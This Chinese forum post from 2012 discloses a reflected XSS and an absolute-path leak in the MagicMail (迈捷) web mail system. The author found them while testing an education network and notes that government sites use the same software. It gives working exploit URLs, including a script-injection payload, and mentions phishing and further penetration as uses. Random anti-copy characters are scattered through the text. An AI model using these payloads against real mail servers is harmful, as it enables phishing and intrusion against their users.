今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞7 {. F! L& j8 y4 E- z
2 ^7 Y8 [& O5 h 9 a! p( x: b' [- Q& l* @
包含 一个反射性XSS 以及 绝对路径泄漏1 o1 _& b: q0 K/ K6 \* R
看了看 貌似全部是linux的。
- x" ?$ S! b: x6 e* Q) ?0 U
5 D+ s3 X8 J. v: g* S: A2 \+ \关键字:迈捷邮件系统 by MagicMail, [, r! F, l/ s6 i, \
! v' D" a' S) b可以看到很多政府网站都用这个邮件系统* L. r% Q: s5 _. }# `) e: M0 O0 [
& _$ n( }0 ]: f6 i
绝对路径 http://madman.in/index.php?login_type=declare&language=
9 \( s2 [- }2 B' O
% y& @" x2 [6 V/ c, r( s) Y' N4 d$ ^6 j
5 R8 g/ a- u4 @1 c, i) mXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E, G; j9 s2 x1 x4 k. C6 s! K# |& V
8 ^. b; E; ?2 N3 u& g$ N% } V
0 T0 A& c, }# d' I. h, G7 d* c+ {& {% K% T2 a
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等7 U+ O3 d2 Q( i- Q8 o3 @. d
- O) C. P2 @% a. ^
修复方案:看官方补丁吧。/ I+ C7 y' k- U+ b
|
发表于 2012-11-9 20:38:41
收藏
支持
反对